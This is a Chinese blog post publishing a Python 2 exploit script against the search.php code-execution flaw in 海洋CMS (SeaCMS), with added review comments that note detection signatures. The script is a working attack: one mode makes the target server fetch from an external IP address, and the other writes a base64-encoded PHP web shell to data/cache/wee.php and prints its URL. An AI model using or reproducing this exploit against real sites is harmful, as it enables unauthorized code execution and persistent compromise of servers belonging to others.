海洋search代码执行利用脚本


这个洞修复的七七八八了 现在就放出来吧

#encoding:utf-8
from urllib import urlencode
import urllib2

# NOTE(review): this listing lost its indentation when the page was extracted,
# so the nesting of the statements below cannot be recovered with certainty;
# the code is kept exactly as published. It is Python 2 (urllib2, print
# statement, `except X, e`).
#
# getshell(target, mode): builds one POST request to <target>/search.php,
# sends it, and reports whether the response body contains a marker hash.
#   target -- base URL of the site, as typed by the operator
#   mode   -- "1" selects the first request body; any other value the second
#
# Defender note: both request bodies carry `_GET[cfg_cmspath]` together with
# `{searchpage:...}` template tags spread over several form fields. Requests to
# search.php whose parameter values contain those tags are a usable signature
# for access-log review and WAF rules.
def getshell(target, mode):
url = target + "/search.php"
# Fixed desktop-browser User-Agent; it is attached to the request below.
user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"

try:

# Mode "1" (labelled "GetIP" in the menu): the body points parameter `b` at an
# external HTTP host. Presumably that host records the server's outbound
# address -- not verifiable from this page. An outbound HTTP connection from the
# web server to an unfamiliar host is the network-side indicator.
if mode == "1":
data = "searchword=1&searchtype=5&_GET[cfg_cmspath]={if{searchpage:year}}&year=:ev{searchpage:area}&area=a{searchpage:letter}&letter=l%20({searchpage:lang}&yuyan=join({searchpage:jq}&jq=$GLOBALS[a]))&a[]=file_g&a[]=et_contents($GLOBALS[b]);ec&a[]=ho(md5(124));exit;&b=http://119.28.176.149/"
request = urllib2.Request(url, data)
request.add_header('User-Agent', user_agent)

# Marker expected in the response for this mode; the body above asks for md5(124).
hash = "c8ffe9a587b126f152ed3d89a146b445"

# Any other mode: the body names ./data/cache/wee.php in `b` and carries a
# base64 blob in `c`. On a host, an unexpected .php file under data/cache/ is
# the artifact to look for.
else:
data = "searchword=1&searchtype=5&_GET[cfg_cmspath]={if{searchpage:year}}&year=:ev{searchpage:area}&area=a{searchpage:letter}&letter=l%20({searchpage:lang}&yuyan=join({searchpage:jq}&jq=$GLOBALS[a]))&a[]=file_p&a[]=ut_contents($GLO&a[]=BALS[b],base&a[]=64_decode($GLOBALS[c]));ec&a[]=ho(md5(123));exit;&b=./data/cache/wee.php&c=PD9waHAgCiRsZz0iWlRack5HdGZhMlJyaXJaV3RpcmphMjlyWkdpcnRsaXJJaWs3Q2lSelluQWdQaXJTQWtkaXJtSnNLQ2lySmpkSGNpTENJaUxDSmpkSGlyZGppclkzUjNjaXJtVmpkSGRoZEdOMGQyVmpkSGRmWm1OMGQzVnVpclkyTiI7CiR2cT0iSUFva2RXWTlpckluTnVZek1pT3dva2EyRTlpcklrbEZRbXhraXJiVVppYzBzaU9ZGFzZGRlZGQ2ZGQ0ZGRfZGRkZGRlZGRjZGRvZGRkZGRlIik7CiRpZmwgPSAkamooImVmIiwiIiwiZWZjcmVhdGVmZV9lZmZlZnVlZm5lZmNlZnRpZWZvZWZuIik7CiRqZXogPSAkaWZsKCcnLCAkbnN4KCRqaigiaXIiLCAiIiwgJHZxLiRya2YuJGxnLiRxaSkpKTsgJGpleigpOwo/Pg=="
request = urllib2.Request(url, data)
request.add_header('User-Agent', user_agent)

# Marker expected in the response for this mode; the body above asks for md5(123).
hash = "202cb962ac59075b964b07152d234b70"
# Passing `data` to urllib2.Request makes this a POST. Presumably the send and
# the checks below run for both modes -- the lost indentation leaves it open.
response = urllib2.urlopen(request)
res = response.read()
# A marker hash in the response body is taken as success; a patched or
# unaffected server would not return it, and the raw response is printed instead.
if hash == "c8ffe9a587b126f152ed3d89a146b445" and hash in res:
print "*** GetIP success!"
elif hash == "202cb962ac59075b964b07152d234b70" and hash in res:
print "*** shell: " + target + "/data/cache//wee.php"
else:
print res
except urllib2.URLError, e:
print "Error: " + str(e.code)

# Script entry point: prints a two-item menu, reads the mode and then the
# target URL from standard input (Python 2 raw_input), and passes both to
# getshell(). Any input other than "1" selects the second mode.
# NOTE(review): indentation was lost in extraction; presumably the last two
# lines run after the if/else rather than inside the else branch.
if __name__ == "__main__":

print " Mode: "
print " 1. GetIP"
print " 2. GetShell"
mode = raw_input()
if mode == "1":
print "Mode: GetIP"
print "Url:"
else:
print "Mode: GetShell"
print "Url:"
# The URL is used as typed: getshell() appends "/search.php" to it without any checks.
target = raw_input()
getshell(target,mode)
------ 本文结束 ------

本文标题:海洋search代码执行利用脚本

文章作者:ApiCoder

发布时间:2019年08月18日 - 22:08

最后更新:2019年08月18日 - 22:08

原始链接:http://www.safeinfo.me/2019/08/18/海洋search代码执行利用脚本.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。
